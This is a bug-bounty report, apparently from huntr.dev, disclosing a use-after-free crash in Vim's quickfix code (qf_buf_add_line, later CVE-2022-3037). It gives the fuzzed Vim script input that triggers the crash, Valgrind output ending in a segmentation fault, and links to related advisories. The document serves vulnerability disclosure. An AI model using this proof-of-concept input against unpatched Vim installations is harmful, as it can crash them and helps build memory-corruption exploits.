Lucene search
BrenuAF4C2F2D-D754-4607-B565-9E92F3F717B5HistoryAug 28, 2022 - 2:15 p.m.
Use After Free in Function qf_buf_add_line( )
2022-08-2814:15:50
brenu
www.huntr.dev
21
bugbounty
memoryerror
valgrindoutput
segmentationfault
fuzzing
commit35a4fbc5d04820d9b08e7da2e295a7e8210e2e2c
EPSS
0.001
Percentile
45.7%
Description
Hello there! How are you doing?
I just used the PoC of this previous report as a valid input for fuzzing, and ended up finding what it seems to be a new case of Use After Free, with a slightly different input. The last commit in which I tested it was 35a4fbc5d04820d9b08e7da2e295a7e8210e2e2c (patch 9.0.0296).
Used Input
com-=* Xg <mods>cgete<args>
fu s:Tqf0unc0(o)
Xg'0'
endf
cope
let&quickfixtextfunc='s:Tqf0unc0'
cg:[ex""
Valgrind Output
==29015== Memcheck, a memory error detector
==29015== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==29015== Using Valgrind-3.16.1 and LibVEX; rerun with -h for copyright info
==29015== Command: ./vim -X -Z -e -s -S test -c :qa!
==29015==
==29015== Invalid read of size 8
==29015== at 0x26EC90: qf_buf_add_line (quickfix.c:4609)
==29015== by 0x26EC90: qf_fill_buffer (quickfix.c:4806)
==29015== by 0x270317: qf_update_buffer (quickfix.c:4570)
==29015== by 0x271647: qf_init_ext (quickfix.c:1820)
==29015== by 0x2743C5: qf_init (quickfix.c:1849)
==29015== by 0x276797: ex_cfile (quickfix.c:5832)
==29015== by 0x1C3E7C: do_one_cmd (ex_docmd.c:2568)
==29015== by 0x1C3E7C: do_cmdline (ex_docmd.c:990)
==29015== by 0x2B28D9: do_source_ext (scriptfile.c:1664)
==29015== by 0x2B48F3: do_source (scriptfile.c:1808)
==29015== by 0x2B48F3: cmd_source (scriptfile.c:1163)
==29015== by 0x2B48F3: ex_source (scriptfile.c:1189)
==29015== by 0x1C3E7C: do_one_cmd (ex_docmd.c:2568)
==29015== by 0x1C3E7C: do_cmdline (ex_docmd.c:990)
==29015== by 0x388F8D: exe_commands (main.c:3133)
==29015== by 0x388F8D: vim_main2 (main.c:780)
==29015== by 0x4A2BD09: (below main) (libc-start.c:308)
==29015== Address 0x30 is not stack'd, malloc'd or (recently) free'd
==29015==
==29015==
==29015== Process terminating with default action of signal 11 (SIGSEGV)
==29015== at 0x4A41087: kill (syscall-template.S:120)
==29015== by 0x25DD5F: may_core_dump (os_unix.c:3519)
==29015== by 0x25DD5F: may_core_dump (os_unix.c:3514)
==29015== by 0x25DD5F: mch_exit (os_unix.c:3485)
==29015== by 0x4A40D5F: ??? (in /lib/x86_64-linux-gnu/libc-2.31.so)
==29015== by 0x26EC8F: qf_buf_add_line (quickfix.c:4665)
==29015== by 0x26EC8F: qf_fill_buffer (quickfix.c:4806)
==29015== by 0x270317: qf_update_buffer (quickfix.c:4570)
==29015== by 0x271647: qf_init_ext (quickfix.c:1820)
==29015== by 0x2743C5: qf_init (quickfix.c:1849)
==29015== by 0x276797: ex_cfile (quickfix.c:5832)
==29015== by 0x1C3E7C: do_one_cmd (ex_docmd.c:2568)
==29015== by 0x1C3E7C: do_cmdline (ex_docmd.c:990)
==29015== by 0x2B28D9: do_source_ext (scriptfile.c:1664)
==29015== by 0x2B48F3: do_source (scriptfile.c:1808)
==29015== by 0x2B48F3: cmd_source (scriptfile.c:1163)
==29015== by 0x2B48F3: ex_source (scriptfile.c:1189)
==29015== by 0x1C3E7C: do_one_cmd (ex_docmd.c:2568)
==29015== by 0x1C3E7C: do_cmdline (ex_docmd.c:990)
==29015==
==29015== HEAP SUMMARY:
==29015== in use at exit: 182,942 bytes in 625 blocks
==29015== total heap usage: 2,360 allocs, 1,735 frees, 2,890,274 bytes allocated
==29015==
==29015== LEAK SUMMARY:
==29015== definitely lost: 4,105 bytes in 4 blocks
==29015== indirectly lost: 0 bytes in 0 blocks
==29015== possibly lost: 1,965 bytes in 47 blocks
==29015== still reachable: 176,872 bytes in 574 blocks
==29015== suppressed: 0 bytes in 0 blocks
==29015== Rerun with --leak-check=full to see details of leaked memory
==29015==
==29015== For lists of detected and suppressed errors, rerun with: -s
==29015== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
Segmentation fault
Related
cnvd
cnvd
Vim Resource Management Error Vulnerability (CNVD-2022-68085)
2022-09-01 00:00:00
osv
osv
CVE-2022-3037
2022-08-30 21:15:00
vim vulnerabilities
2023-08-21 05:45:06
gvim-9.0.0453-2.1 on GA media
2024-06-15 00:00:00
debiancve
debiancve
CVE-2022-3037
2022-08-30 21:15:09
cve
cve
CVE-2022-3037
2022-08-30 21:15:09
nessus
nessus
CBL Mariner 2.0 Security Update: vim (CVE-2022-3037)
2023-03-28 00:00:00
SUSE SLED15 / SLES15 Security Update : vim (SUSE-SU-2022:4282-1)
2022-11-30 00:00:00
Ubuntu 18.04 ESM / 20.04 LTS / 22.04 LTS : Vim vulnerabilities (USN-6302-1)
2023-08-21 00:00:00
openvas
openvas
Fedora: Security Advisory for vim (FEDORA-2022-221bd89404)
2022-09-05 00:00:00
Fedora: Security Advisory for vim (FEDORA-2022-35d9bdb7dc)
2022-09-07 00:00:00
Fedora: Security Advisory for vim (FEDORA-2022-b9edf60581)
2022-09-15 00:00:00
fedora
fedora
[SECURITY] Fedora 36 Update: vim-9.0.348-1.fc36
2022-09-04 22:49:30
[SECURITY] Fedora 35 Update: vim-9.0.348-1.fc35
2022-09-06 10:31:40
[SECURITY] Fedora 37 Update: vim-9.0.412-1.fc37
2022-09-14 00:28:23
cbl_mariner
cbl_mariner
CVE-2022-3037 affecting package vim for versions less than 9.0.0325-1
2022-09-16 06:05:42
CVE-2022-3037 affecting package vim 9.0.0181-1
2022-09-17 05:56:39
ubuntucve
ubuntucve
CVE-2022-3037
2022-08-30 00:00:00
redhatcve
redhatcve
CVE-2022-3037
2022-08-31 19:59:45
prion
prion
Design/Logic Flaw
2022-08-30 21:15:00
nvd
nvd
CVE-2022-3037
2022-08-30 21:15:09
cvelist
cvelist
CVE-2022-3037 Use After Free in vim/vim
2022-08-30 20:35:10
veracode
veracode
Use-After-Free
2022-09-13 04:34:53
alpinelinux
alpinelinux
CVE-2022-3037
2022-08-30 21:15:09
redos
redos
ROS-20221123-01
2022-11-23 00:00:00
cloudfoundry
cloudfoundry
USN-6302-1: Vim vulnerabilities | Cloud Foundry
2023-10-05 00:00:00
ubuntu
ubuntu
Vim vulnerabilities
2023-08-21 00:00:00
ibm
ibm
photon
photon
Critical Photon OS Security Update - PHSA-2023-4.0-0380
2023-04-25 00:00:00
Critical Photon OS Security Update - PHSA-2023-3.0-0568
2023-04-19 00:00:00
mageia
mageia
Updated vim packages fix security vulnerability
2022-11-19 01:50:51